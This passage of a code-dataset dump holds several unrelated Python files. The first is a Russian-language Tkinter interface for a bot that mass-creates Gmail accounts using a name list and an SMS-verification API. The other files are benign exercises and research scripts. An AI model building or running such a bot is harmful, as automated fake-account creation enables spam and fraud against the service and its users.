0))\n\n\t\tstop_btn = tk.Button(main_tab, text='Стоп', command=self.on_stop, width=30, height=2)\n\t\tstop_btn.pack(side=tk.RIGHT, anchor=tk.NW, pady=(30, 0), padx=(0, 5))\n\n\tdef accounts(self, tab_control):\n\t\taccounts_tab = tk.Frame(tab_control)\n\t\ttab_control.add(accounts_tab, text='Аккаунты')\n\t\ttab_control.pack(expand=True, fill=tk.BOTH)\n\n\t\ttk.Label(accounts_tab, font=self.head_font, text='Созданные аккаунты gmail:')\\\n\t\t\t.pack(side=tk.TOP, anchor=tk.NW, pady=(20, 0), padx=(5, 0))\n\t\tself.accounts_list_field = ScrolledText(accounts_tab)\n\t\tself.accounts_list_field.pack(expand=True, fill=tk.BOTH, pady=(0, 20), padx=5)\n\n\t\tcopy_btn = tk.Button(accounts_tab, text='Скопировать все', command=self.on_copy_accounts)\n\t\tcopy_btn.pack(side=tk.LEFT, padx=(5, 0), pady=(0, 10))\n\n\t\tcopy_today_btn = tk.Button(accounts_tab, text='Скопировать сегодняшние', command=self.on_copy_today_accounts)\n\t\tcopy_today_btn.pack(side=tk.LEFT, padx=(5, 0), pady=(0, 10))\n\n\t\tclear_btn = tk.Button(accounts_tab, text='Очистить все', command=self.on_clear_accounts)\n\t\tclear_btn.pack(side=tk.RIGHT, padx=(0, 5), pady=(0, 10))\n\t\t\n\t\tself.accounts_file = 
open(join(self.accounts_dir, self.current_date + '.txt'), 'a+')\n\n\t\tself.accounts_list = []\n\n\t\tfor file in listdir(self.accounts_dir):\n\t\t\tif isfile(join(self.accounts_dir, file)):\n\t\t\t\t_, file_ext = os.path.splitext(file)\n\t\t\t\tif file_ext == '.txt':\n\t\t\t\t\tself.accounts_list.append(join(self.accounts_dir, file))\n\n\t\tself.accounts_list.sort(key=lambda x: x.split('-'), reverse=True)\n\n\t\tfor file in self.accounts_list:\n\t\t\taccounts = open(file, 'r')\n\t\t\tfile_name, _ = os.path.splitext(file)\n\t\t\tfile_name_chunks = file_name.split(os.sep)\n\t\t\tfile_name = file_name_chunks[-1]\n\t\t\tfor account in accounts:\n\t\t\t\tself.accounts_list_field.insert(tk.END, file_name + ' | ' + account)\n\n\tdef names(self, tab_control):\n\t\tnames_tab = tk.Frame(tab_control)\n\t\ttab_control.add(names_tab, text='Имена')\n\t\ttab_control.pack(expand=True, fill=tk.BOTH)\n\n\t\ttk.Label(names_tab, font=self.head_font, text='Имена:')\\\n\t\t\t.pack(side=tk.TOP, anchor=tk.NW, pady=(20, 0), padx=(5, 0))\n\t\tself.names_list_field = ScrolledText(names_tab)\n\t\tself.names_list_field.pack(expand=True, fill=tk.BOTH, pady=(0, 20), padx=5)\n\n\t\tnames = open(self.namesfile, 'r')\n\n\t\tfor name in names:\n\t\t\tself.names_list_field.insert(tk.END, name)\n\n\t\tsave_btn = tk.Button(names_tab, text='Сохранить', command=self.on_save_names, width=30, height=2)\n\t\tsave_btn.pack(side=tk.BOTTOM, anchor=tk.NE, padx=(0, 5), pady=(30, 10))\n\n\tdef configs(self, tab_control):\n\t\tconfigs_tab = tk.Frame(tab_control)\n\t\ttab_control.add(configs_tab, text='Настройки')\n\t\ttab_control.pack(expand=True, fill=tk.BOTH)\n\n\t\tself.config.read(self.configfile)\n\t\tself.api_key = tk.StringVar()\n\t\tself.wait_code_time = tk.IntVar()\n\t\tself.request_for_code_time = tk.IntVar()\n\t\tself.backup_email = tk.StringVar()\n\t\tself.wait_element_time = tk.IntVar()\n\t\tself.wait_page_reload_time = tk.IntVar()\n\n\t\tself.api_key.set(self.config['api']['api_key'])\n\t\tself.wait_code_time.set(self.config['api']['wait_code_time'])\n\t\tself.request_for_code_time.set(self.config['api']['request_for_code_time'])\n\t\tself.backup_email.set(self.config['user_data']['backup_email'])\n\t\tself.wait_element_time.set(self.config['app']['wait_element_time'])\n\t\tself.wait_page_reload_time.set(self.config['app']['wait_page_reload_time'])\n\n\t\tfields = [\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Api ключ'), \n\t\t\t\ttk.Entry(configs_tab, textvariable=self.api_key, width=35)\n\t\t\t],\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Время ожидания смс кода'), \n\t\t\t\ttk.Entry(configs_tab, textvariable=self.wait_code_time, width=35)\n\t\t\t],\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Время ожидания перед запросом\\nсмс кода'), \n\t\t\t\ttk.Entry(configs_tab, textvariable=self.request_for_code_time, width=35)\n\t\t\t],\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Email адресс для восстановления'),\n\t\t\t\ttk.Entry(configs_tab, textvariable=self.backup_email, width=35)\n\t\t\t],\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Время ожидания появления\\n элемента'),\n\t\t\t\ttk.Entry(configs_tab, textvariable=self.wait_element_time, width=35)\n\t\t\t],\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Время ожидания перед\\n перезагрузкой страницы'),\n\t\t\t\ttk.Entry(configs_tab, textvariable=self.wait_page_reload_time, width=35)\n\t\t\t]\n\t\t]\n\n\t\ti = 0\n\t\tfor field in fields:\n\t\t\tfield[0].grid(row=i, column=0, padx=5, pady=15)\n\t\t\tfield[1].grid(row=i, column=1, padx=5, pady=15)\n\t\t\ti += 
1\n\n\t\tsave_btn = tk.Button(configs_tab, text='Сохранить', command=self.on_save_accounts, width=30, height=2)\n\t\tsave_btn.place(relx=0.991, rely=0.982, anchor=tk.SE)\n\n\tdef on_save_accounts(self):\n\t\tself.config['api'] = {\n\t\t\t'api_key': self.api_key.get(),\n\t\t\t'wait_code_time': self.wait_code_time.get(),\n\t\t\t'request_for_code_time': self.request_for_code_time.get()\n\t\t}\n\n\t\tself.config['user_data'] = {\n\t\t\t'backup_email': self.backup_email.get()\n\t\t}\n\n\t\tself.config['app'] = {\n\t\t\t'wait_element_time': self.wait_element_time.get(),\n\t\t\t'wait_page_reload_time': self.wait_page_reload_time.get()\n\t\t}\n\n\t\twith open(self.configfile, 'w+') as configfile:\n\t\t\tself.config.write(configfile)\n\t\t\tself.dialog('Уведомление', 'Настройки были успешно сохранены.')\n\n\tdef on_copy_accounts(self):\n\t\tself.clipboard_append(self.accounts_list_field.get('1.0', tk.END))\n\t\tself.dialog('Уведомление', 'Аккаунты были скопированы.\\nCTRL + V чтобы вставить.')\n\n\tdef on_copy_today_accounts(self):\n\t\taccounts_list = self.accounts_list_field.get('1.0', tk.END).split('\\n')\n\t\tcurrent_accounts_list = []\n\n\t\tfor account in accounts_list:\n\t\t\taccount_chunks = account.split(' | ')\n\t\t\tif account_chunks[0] == self.current_date:\n\t\t\t\tcurrent_accounts_list.append(' | '.join(account_chunks))\n\n\t\tcurrent_accounts_list = '\\n'.join(current_accounts_list)\n\n\t\tif not current_accounts_list:\n\t\t\tself.dialog('Уведомление', 'Вы не создали ни один аккаунт сегодня.')\n\t\telse:\n\t\t\tself.clipboard_append(current_accounts_list)\n\t\t\tself.dialog('Уведомление', 'Аккаунты были скопированы.\\nCTRL + V чтобы вставить.')\n\n\tdef dialog(self, title, message):\n\t\twindow = tk.Toplevel()\n\t\twindow.geometry('%dx%d+%d+%d' % (300, 150, \n\t\t\tself.winfo_x() + (self.winfo_width() / 4), \n\t\t\tself.winfo_y() + (self.winfo_height() / 4))\n\t\t)\n\t\twindow.title(title)\n\t\ttk.Message(window, text=message, font=('Verdana', 15), width=300)\\\n\t\t\t.pack(side=tk.TOP, anchor=tk.CENTER, pady=5)\n\t\ttk.Button(window, text='OK', width=20, command=lambda: window.destroy())\\\n\t\t\t.pack(side=tk.BOTTOM, anchor=tk.CENTER, pady=(0, 10))\n\n\t\twindow.after(3000, lambda: window.destroy())\n\t\treturn window\n\n\tdef on_clear_accounts(self):\n\t\tself.accounts_list_field.delete('1.0', tk.END)\n\t\tfor account in self.accounts_list:\n\t\t\tos.remove(account)\n\t\tself.dialog('Уведомление', 'Аккаунты удалены.')\n\n\tdef on_save_names(self):\n\t\tnames_list = self.names_list_field.get('1.0', tk.END).split('\\n')\n\t\tnames_list = list(filter(None, names_list))\n\t\tnames_list = [name.strip() for name in names_list]\n\t\tnames_list = '\\n'.join(names_list)\n\n\t\tnames = open(self.namesfile, 'w+')\n\t\tnames.write(names_list)\n\t\tnames.close()\n\t\tself.dialog('Уведомление', 'Имена были успешно сохранены.')\n\n\tdef on_start(self):\n\t\tthreading.Thread(target=self.gbot_start).start()\n\n\tdef on_stop(self):\n\t\tif self.gbot is not None:\n\t\t\tself.gbot.destroy()\n\n\t\tself.start_btn.configure(state='normal')\n\n\tdef gbot_start(self):\n\t\ttry:\n\t\t\tself.start_btn.configure(state='disabled')\n\t\t\tself.gbot = Gbot(\n\t\t\t\tlambda message: self.logger(message),\n\t\t\t\tlambda account: self.add_account(account)\n\t\t\t)\n\t\t\tself.gbot.prepare()\n\t\t\tself.gbot.launch(self.accounts_amount.get())\n\t\texcept WebDriverException:\n\t\t\tself.start_btn.configure(state='normal')\n\n\tdef logger(self, message):\n\t\tself.log_list_field.insert(tk.END, message + 
'\\n')\n\t\tself.log_list_field.see(tk.END)\n\n\tdef add_account(self, account):\n\t\tself.accounts_file.write(account + '\\n')\n\t\tself.accounts_list_field.insert(tk.END, account + '\\n')\n\t\tself.accounts_list_field.see(tk.END)\n\nif __name__ == '__main__':\n\tfacade = Facade()\n\tfacade.mainloop()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"196952285","text":"import os, random\nimport io\nimport numpy as np\nfrom PIL import Image\n\n\nclass BlackBox():\n\n def __init__(self,shredded_path,orig_path):\n self.shredded_image=Image.open(shredded_path)\n self.original_image=Image.open(orig_path)\n self.blocks=self.create_blocks()\n\n def PIL2array(self,img):\n return np.array(img.getdata(),\n np.uint8).reshape(img.size[1], img.size[0],1)\n\n def array2PIL(self,arr, size):\n mode = 'L'\n arr = arr.reshape(arr.shape[0]*arr.shape[1], arr.shape[2])\n if len(arr[0]) == 3:\n arr = np.c_[arr, 255*np.ones((len(arr),1), np.uint8)]\n return Image.frombuffer(mode, size, arr.tostring(), 'raw', mode, 0, 1)\n\n\n\n def create_blocks(self): \n blocks=[] \n for i in range(1,129): \n blocks.append(list(range((i-1)*5,i*5))) \n return blocks \n\n\n def swap(self,indexes,matrix):\n permutation=[]\n for i in indexes:\n permutation.extend(self.blocks[i])\n return matrix[:,permutation]\n\n def evaluate_solution(self,permutation):\n if len(permutation) != len(self.blocks):\n raise Exception(\"Size of permutation list is wrong. It should be {0}\".format(len(self.blocks)))\n \n origin_matrix=self.PIL2array(self.original_image)\n np_matrix=self.PIL2array(self.shredded_image)\n np_matrix=self.swap(permutation,np_matrix)\n return np.sum(np.abs(np_matrix-origin_matrix))\n\n\n def show_solution(self,permutation, record=None):\n if not isinstance(permutation,list):\n raise Exception(\"You should provide a permutation list\")\n np_matrix=self.PIL2array(self.shredded_image)\n np_matrix=self.swap(permutation,np_matrix)\n new_image=self.array2PIL(np_matrix,self.original_image.size)\n if record is None:\n new_image.show()\n else:\n new_image.save(record)\n \n\n\n\n","sub_path":"blackbox.py","file_name":"blackbox.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"386089093","text":"import argparse\n\nfrom core_data_modules.logging import Logger\nfrom core_data_modules.traced_data.io import TracedDataJsonIO\nfrom core_data_modules.util import IOUtils\n\nfrom src import LoadData, TranslateRapidProKeys, AutoCode, ProductionFile, \\\n ApplyManualCodes, AnalysisFile, WSCorrection\nfrom src.lib import PipelineConfiguration, MessageFilters\n\nlog = Logger(__name__)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Runs the post-fetch phase of the pipeline\")\n\n parser.add_argument(\"user\", help=\"User launching this program\")\n parser.add_argument(\"pipeline_run_mode\", help=\"whether to generate analysis files or not\",\n choices=[\"all-stages\", \"auto-code-only\"])\n parser.add_argument(\"pipeline_configuration_file_path\", metavar=\"pipeline-configuration-file\",\n help=\"Path to the pipeline configuration json file\")\n\n parser.add_argument(\"raw_data_dir\", metavar=\"raw-data-dir\",\n help=\"Path to a directory containing the raw data files exported by fetch_raw_data.py\")\n parser.add_argument(\"prev_coded_dir_path\", metavar=\"prev-coded-dir-path\",\n 
help=\"Directory containing Coda files generated by a previous run of this pipeline. \"\n \"New data will be appended to these files.\")\n\n parser.add_argument(\"auto_coding_json_output_path\", metavar=\"auto-coding-json-output-path\",\n help=\"Path to a JSON file to write the TracedData associated with auto-coding stage of the pipeline\")\n parser.add_argument(\"messages_json_output_path\", metavar=\"messages-json-output-path\",\n help=\"Path to a JSONL file to write the TracedData associated with the messages analysis file\")\n parser.add_argument(\"individuals_json_output_path\", metavar=\"individuals-json-output-path\",\n help=\"Path to a JSONL file to write the TracedData associated with the individuals analysis file\")\n parser.add_argument(\"icr_output_dir\", metavar=\"icr-output-dir\",\n help=\"Directory to write CSV files to, each containing 200 messages and message ids for use \" \n \"in inter-code reliability evaluation\"),\n parser.add_argument(\"coded_dir_path\", metavar=\"coded-dir-path\",\n help=\"Directory to write coded Coda files to\")\n parser.add_argument(\"csv_by_message_output_path\", metavar=\"csv-by-message-output-path\",\n help=\"Analysis dataset where messages are the unit for analysis (i.e. one message per row)\")\n parser.add_argument(\"csv_by_individual_output_path\", metavar=\"csv-by-individual-output-path\",\n help=\"Analysis dataset where respondents are the unit for analysis (i.e. one respondent \"\n \"per row, with all their messages joined into a single cell)\")\n parser.add_argument(\"production_csv_output_path\", metavar=\"production-csv-output-path\",\n help=\"Path to a CSV file to write raw message and demographic responses to, for use in \"\n \"radio show production\"),\n\n args = parser.parse_args()\n\n pipeline_run_mode = args.pipeline_run_mode\n user = args.user\n pipeline_configuration_file_path = args.pipeline_configuration_file_path\n\n raw_data_dir = args.raw_data_dir\n prev_coded_dir_path = args.prev_coded_dir_path\n\n auto_coding_json_output_path = args.auto_coding_json_output_path\n messages_json_output_path = args.messages_json_output_path\n individuals_json_output_path = args.individuals_json_output_path\n icr_output_dir = args.icr_output_dir\n coded_dir_path = args.coded_dir_path\n csv_by_message_output_path = args.csv_by_message_output_path\n csv_by_individual_output_path = args.csv_by_individual_output_path\n production_csv_output_path = args.production_csv_output_path\n\n # Load the pipeline configuration file\n log.info(\"Loading Pipeline Configuration File...\")\n with open(pipeline_configuration_file_path) as f:\n pipeline_configuration = PipelineConfiguration.from_configuration_file(f)\n Logger.set_project_name(pipeline_configuration.pipeline_name)\n log.debug(f\"Pipeline name is {pipeline_configuration.pipeline_name}\")\n\n log.info(\"Loading the raw data...\")\n data = LoadData.load_raw_data(user, raw_data_dir, pipeline_configuration)\n\n log.info(\"Translating Rapid Pro Keys...\")\n data = TranslateRapidProKeys.translate_rapid_pro_keys(user, data, pipeline_configuration)\n\n if pipeline_configuration.move_ws_messages:\n log.info(\"Pre-filtering empty message objects...\")\n # This is a performance optimisation to save execution time + memory when moving WS messages, by removing\n # the need to mark and process a high volume of empty message objects as 'NR' in WS correction.\n # Empty message objects represent flow runs where the participants never sent a message e.g. 
from an advert\n        # flow run where we asked someone a question but didn't receive a response.\n        data = MessageFilters.filter_empty_messages(data,\n                                                    [plan.raw_field for plan in PipelineConfiguration.RQA_CODING_PLANS])\n\n        log.info(\"Moving WS messages...\")\n        data = WSCorrection.move_wrong_scheme_messages(user, data, prev_coded_dir_path)\n    else:\n        log.info(\"Not moving WS messages (because the 'MoveWSMessages' key in the pipeline configuration \"\n                 \"json was set to 'false')\")\n\n    log.info(\"Auto Coding...\")\n    data = AutoCode.auto_code(user, data, pipeline_configuration, icr_output_dir, coded_dir_path)\n\n    log.info(\"Exporting production CSV...\")\n    data = ProductionFile.generate(data, production_csv_output_path)\n\n    if pipeline_run_mode == \"all-stages\":\n        log.info(\"Running post labelling pipeline stages...\")\n\n        log.info(\"Applying Manual Codes from Coda...\")\n        data = ApplyManualCodes.apply_manual_codes(user, data, prev_coded_dir_path)\n\n        log.info(\"Generating CSVs for Analysis...\")\n        messages_data, individuals_data = AnalysisFile.generate(user, data, csv_by_message_output_path,\n                                                                csv_by_individual_output_path)\n\n        log.info(\"Writing messages TracedData to file...\")\n        IOUtils.ensure_dirs_exist_for_file(messages_json_output_path)\n        with open(messages_json_output_path, \"w\") as f:\n            TracedDataJsonIO.export_traced_data_iterable_to_jsonl(messages_data, f)\n\n        log.info(\"Writing individuals TracedData to file...\")\n        IOUtils.ensure_dirs_exist_for_file(individuals_json_output_path)\n        with open(individuals_json_output_path, \"w\") as f:\n            TracedDataJsonIO.export_traced_data_iterable_to_jsonl(individuals_data, f)\n    else:\n        assert pipeline_run_mode == \"auto-code-only\", \"pipeline run mode must be either auto-code-only or all-stages\"\n        log.info(\"Writing Auto-Coding TracedData to file...\")\n        IOUtils.ensure_dirs_exist_for_file(auto_coding_json_output_path)\n        with open(auto_coding_json_output_path, \"w\") as f:\n            TracedDataJsonIO.export_traced_data_iterable_to_jsonl(data, f)\n\n    log.info(\"Python script complete\")\n","sub_path":"generate_outputs.py","file_name":"generate_outputs.py","file_ext":"py","file_size_in_byte":7279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"559632981","text":"#Given an integer array , output all the unique pairs that sum up to a specific value k\ndef pair_sum(array, k):\n    if len(array) < 2:\n        return print(\"Too small\")\n\n    seen = set()\n    output = set()\n\n    for num in array:\n        # the complement that would pair with num to reach the target sum k\n        target = k - num\n\n        if target not in seen:\n            seen.add(num)\n\n        else:\n            output.add((min(num, target), max(num, target)))\n    \n    print(\"\\n\".join(map(str, list(output))))\n\npair_sum([1, 2, 3, 2], 4)","sub_path":"array_pair_sum.py","file_name":"array_pair_sum.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"614952501","text":"# Author: Aline Paulette Villegas Berdejo\n# Description: Text that briefly describes the problem you are solving.\n\n# Write your program after this line.\nm=int(input(\"Women enrolled: \"))\nh=int(input(\"Men enrolled: \"))\n\nta=m+h\npm=(m*100)/ta\nph=(h*100)/ta\n\nprint(\"Total enrolled: \", ta)\nprint(\"Percentage of women: %.1f\" % pm,\"%\")\nprint(\"Percentage of men: %.1f\" % ph, \"%\")\n","sub_path":"clase.py","file_name":"clase.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"356667266","text":"\"\"\"\r\nMedical Image Analysis (8DC00)\r\nProject Registration\r\nProject Group 20\r\nRebecca Küpper (1008070)\r\nMilan Pit (1025441)\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport registration as reg\r\nimport registration_util as util\r\nfrom IPython.display import display, clear_output\r\nfrom time import time\r\nimport sys\r\nimport os\r\n\r\n## new ##\r\nos.chdir('project')\r\n## --- ##\r\n\r\ndef chooseImage(filenumber, t1t2):\r\n \"\"\"\r\n Choose the right images according to the input\r\n \r\n The inputs are:\r\n filenumber - indicates number of the image, one of ['1_1', '1_2', '1_3', '2_1', '2_2', '2_3', '3_1', '3_2', '3_3']\r\n t1t2 - indicates if you want T1-to-T1 registration or T2-to-T1 registration\r\n \r\n The outputs are:\r\n path_I: the path to the fixed image\r\n path_Im: the path to the moving image\r\n \"\"\"\r\n \r\n filelist = ['1_1', '1_2', '1_3', '2_1', '2_2', '2_3', '3_1', '3_2', '3_3']\r\n \r\n #Assures that the input is right\r\n assert (filenumber in filelist), \"Invalid input, filenumber has to be in {}\".format(filelist) \r\n assert (t1t2=='t1' or t1t2=='t2'), \"Invalid input, t1t2 has to be 't1' or 't2'\"\r\n\r\n \r\n #Picks images depending on input\r\n path_I = '../data/image_data/{}_t1.tif'.format(filenumber)\r\n\r\n if t1t2 == 't1':\r\n path_Im = '../data/image_data/{}_t1_d.tif'.format(filenumber)\r\n else:\r\n path_Im = '../data/image_data/{}_t2.tif'.format(filenumber)\r\n \r\n return path_I, path_Im\r\n\r\ndef pointBasedRegistration(filenumber='3_3',t1t2='t1'):\r\n \"\"\"\r\n Perform point-based registration on two images\r\n This can be between T1-to-T1 registration or T2-to-T1 registration\r\n \r\n The inputs are:\r\n filenumber - indicates number of the image, one of ['1_1', '1_2', '1_3', '2_1', '2_2', '2_3', '3_1', '3_2', '3_3']\r\n t1t2 - indicates if you want T1-to-T1 registration or T2-to-T1 registration\r\n \r\n The outputs are:\r\n Im_t - transformed moving image T(Im)\r\n E_reg - registration error\r\n \"\"\"\r\n \r\n #Chooses images from given input\r\n path_I, path_Im = chooseImage(t1t2, filenumber)\r\n \r\n \r\n I = plt.imread(path_I)\r\n Im = plt.imread(path_Im)\r\n\r\n #Selects points for registration\r\n X, Xm = util.my_cpselect(path_I, path_Im)\r\n\r\n #Makes transformation matrix for registration depending on selected points and applies to the image\r\n T = reg.ls_affine(X,Xm)\r\n Im_t, Xt = reg.image_transform(Im, T)\r\n \r\n #Selects points for registration error\r\n X_ev, X_ev_m = util.my_cpselect(path_I, path_Im)\r\n \r\n #Transforms evaluation points of moved image by inverse transformation matrix\r\n T_inv = np.linalg.inv(T)\r\n X_ev_h = util.c2h(np.array(X_ev_m)) \r\n \r\n #Computes registration error using average distance using Pythagoras\r\n n = len(X_ev[1])\r\n dist = 0\r\n \r\n X_ev_t = T_inv.dot(X_ev_h)\r\n for idx in range(0, n-1):\r\n dist = dist + np.sqrt((X_ev[0][idx] - X_ev_t[0][idx])**2 + (X_ev[1][idx] - X_ev_t[1][idx])**2)\r\n \r\n E_reg = dist / n\r\n \r\n print(E_reg)\r\n \r\n return Im_t, E_reg\r\n\r\ndef intensityBasedRegistration(affine=True, corr=True, iterations=250, mu=1e-3, t1t2='t1', filenumber='1_1'):\r\n \"\"\"\r\n This function is an application of intensity based image registration.\r\n It uses three available methods of intensity based registration:\r\n rigid correlation, affine correlation and affine mutual information.\r\n These functions calculate similarity between the two input images, which is used to register the 
images.\r\n\r\n The inputs are:\r\n affine (default=True): A boolean that determines whether the affine or rigid method is used.\r\n True means the affine method is used, False means the rigid method is used.\r\n corr (default=True): A boolean that determines whether the similarity is calculated using correlation or mutual information.\r\n True means that correlation is used, False means that mutual information is used. If affine=False, correlation will automatically be used.\r\n iterations (default=250): An integer that determines the amount of times the gradient ascent is updated.\r\n mu (default=1e-3): A float that determines the learning rate of the gradient ascent.\r\n\r\n The output is:\r\n A single image containing:\r\n The final registration; The parameters of the registration; The similarity curve of the two images.\r\n\r\n An example of a correct function call:\r\n intensityBasedRegistration(True, True, 50, 1e-2)\r\n \"\"\"\r\n\r\n #Sanitizes input\r\n iterations = int(iterations)\r\n \r\n # Choose images from given input\r\n path_I, path_Im = chooseImage(t1t2, filenumber)\r\n \r\n \r\n I = plt.imread(path_I)\r\n Im = plt.imread(path_Im)\r\n\r\n #Sets initial parameters and function based on input\r\n if(affine):\r\n x = np.array([0., 1., 1., 0., 0., 0., 0.])\r\n if(corr):\r\n fun = lambda x: reg.affine_corr(I, Im, x)\r\n else:\r\n fun = lambda x: reg.affine_mi(I, Im, x)\r\n else:\r\n x = np.array([0., 0., 0.])\r\n fun = lambda x: reg.rigid_corr(I, Im, x)\r\n\r\n similarity = np.full((iterations, 1), np.nan)\r\n\r\n fig = plt.figure(figsize=(20,10))\r\n\r\n # fixed and moving image, and parameters\r\n ax1 = fig.add_subplot(121)\r\n\r\n # fixed image\r\n im1 = ax1.imshow(I)\r\n \r\n # moving image\r\n im2 = ax1.imshow(I, alpha=0.7)\r\n \r\n #Shows parameters in image\r\n txt = ax1.text(0.3, 0.95,\r\n np.array2string(x, precision=5, floatmode='fixed'),\r\n bbox={'facecolor': 'white', 'alpha': 1, 'pad': 10},\r\n transform=ax1.transAxes)\r\n\r\n #Sets up similarity curve\r\n ax2 = fig.add_subplot(122, xlim=(0, iterations), ylim=(0, 1))\r\n\r\n learning_curve, = ax2.plot(range(1,iterations+1), similarity, lw=2)\r\n ax2.set_xlabel('Iteration')\r\n ax2.set_ylabel('Similarity (%s)' %(\"Correlation\"*(corr) + \"Mutual Information\"*(1-corr)))\r\n ax2.grid()\r\n\r\n # #Logging steps are calculated. 
Cannot be done easier,\r\n # #as it is not guaranteed that the amount of iterations is evenly divisible by 4\r\n # step1 = int(iterations/4-1)\r\n # step2 = int(iterations/2-1)\r\n # step3 = int(iterations*3/4-1)\r\n\r\n #Stores start time of gradient ascent\r\n start_time = time()\r\n \r\n #Applies gradient descent [iterations] times\r\n for k in np.arange(iterations):\r\n \r\n #Gradient is calculated and applied to the parameters\r\n g = reg.ngradient(fun, x)\r\n x += g*mu\r\n\r\n #Calls similarity function to calculate the similarity and transformed image\r\n S, Im_t, _ = fun(x)\r\n\r\n # #Logs time elapsed and estimated total time of the gradient ascent\r\n print(\"Iteration {:d}/{:d}, {:.2f}% done\".format(k+1, iterations, (k+1)/iterations * 100))\r\n # \r\n # if(k == 0 or k == step1 or k == step2 or k == step3):\r\n # print(\"Elapsed time: {:.1f} s\\nEstimated time: {:.1f} s\".format(\r\n # time()-start_time, (time()-start_time) * (iterations/(k+1))))\r\n # \r\n # elif(k+1==iterations):\r\n # print(\"Duration: {:.2f} s\".format(time()-start_time))\r\n \r\n #Updates moving image and parameters\r\n im2.set_data(Im_t)\r\n txt.set_text(np.array2string(x, precision=5, floatmode='fixed'))\r\n\r\n #Updates similarity curve\r\n similarity[k] = S\r\n learning_curve.set_ydata(similarity)\r\n\r\n #Logs end result of similarity\r\n print(\"Final similarity: %f\" %(S))\r\n\r\n #Shows final image and plot (required for non-jupyter python)\r\n # plt.show() \r\n filename = \"../plaatjes/{}__{}__9e5__250it.png\".format(t1t2, filenumber) \r\n plt.savefig(filename)\r\n return S\r\n\r\nif(__name__ == \"__main__\"): \r\n\r\n # Uncomment either point based registration or intensity based registration.\r\n \r\n images = ('1_1', '1_2', '1_3', '2_1', '2_2', '2_3', '3_1', '3_2', '3_3')\r\n t1t2 = 't2' \r\n \r\n ######################################################\r\n \r\n # Point based registration\r\n \r\n # pointBasedRegistration(t1t2,images[0])\r\n \r\n ######################################################\r\n \r\n # Intensity based registration\r\n \r\n aff = True\r\n corr = True\r\n it = 250\r\n mu = 9e-5\r\n \r\n S = []\r\n for i, image in enumerate(images):\r\n print(\"Processing image {} of {}.\".format(i+1, len(images)))\r\n S.append(intensityBasedRegistration(aff, corr, it, mu, image, t1t2))\r\n \r\n \r\n # Print results\r\n for j in range(len(S)):\r\n print(images[j]+': '+str(S[j]))\r\n \r\n #######################################################\r\n \r\n \r\n \r\n","sub_path":"project/registration_project.py","file_name":"registration_project.py","file_ext":"py","file_size_in_byte":8632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"227667614","text":"def is_palindrome_num(num):\n if num == 0:\n return True\n elif num < 0:\n i = num * (-1)\n else:\n i = num\n num_list = []\n while i / 10 != 0:\n num_list.append(i % 10)\n i = i // 10\n is_palindrome = True\n l_idx = 0\n r_idx = len(num_list) - 1\n while r_idx > l_idx:\n if num_list[l_idx] != num_list[r_idx]:\n is_palindrome = False\n break\n r_idx -= 1\n l_idx += 1\n return is_palindrome\n\n\nprint(is_palindrome_num(0))\nmax_palindrome = -1\ns_cycle = False\nfor i in range(100, 1000):\n for j in range(100, 1000):\n mult = i * j\n is_pal = is_palindrome_num(mult)\n if is_pal and mult > max_palindrome:\n max_palindrome = 
mult\n\nprint(max_palindrome)","sub_path":"DedMokar/Palindrome.py","file_name":"Palindrome.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"506270088","text":"#!/usr/bin/env python\n__author__ = \"Mike Gavrilov\"\n__copyright__ = \"Copyright 2013\"\n__license__ = \"\"\n__version__ = \"0.5\"\n__email__ = \"gavrikster _ at _ gmail.com\"\n__status__ = \"Beta\"\n\n\nimport sys\nfrom PySide.QtGui import *\nfrom mainWindow import MainWindow\n\napp = QApplication(sys.argv)\n\nMAIN_WINDOW = MainWindow()\nMAIN_WINDOW.show()\nMAIN_WINDOW.on_tool_cm_press()\n\napp.exec_()\n\n","sub_path":"sqldumpGUI.py","file_name":"sqldumpGUI.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"78000192","text":"import math\n#diameter of jar = 10cm\n#height of jar = 16cm\n#circumference = 2πr\n#area of circle = πr²\n\npi = math.pi\njar_diameter = 10\njar_radius = 5\njar_height = 16\njar_base_area = pi*(jar_radius ** 2)\njar_volume_cm = jar_base_area * jar_height\nprint(jar_volume_cm)\n\ncookie_diameter = 6\ncookie_radius = 3\ncookie_height = 2\ncookie_base_area = pi*(cookie_radius ** 2)\ncookie_volume_cm = cookie_base_area * cookie_height\nprint(cookie_volume_cm)\n\nincrement = int(0)\n\ncookiefit = True\n\nwhile cookiefit == True:\n print(increment)\n if cookie_volume_cm > jar_volume_cm:\n cookiefit = False\n else:\n jar_volume_cm = jar_volume_cm - cookie_volume_cm\n increment = increment + 1\n\nprint(\"finished\")\n#MATHS\n#\n#math.pi\n#math.sqrt(2)\n#math.sqrt(-1)\n#math.sin(0)\n#math.sin(math.pi / 2)\n#math.log(1)\n#math.log(math.e)\n#\n#\n#\n#\n#\n#\n\n\n","sub_path":"jar.py","file_name":"jar.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"55480363","text":"#pip\r\n# pip\r\nimport 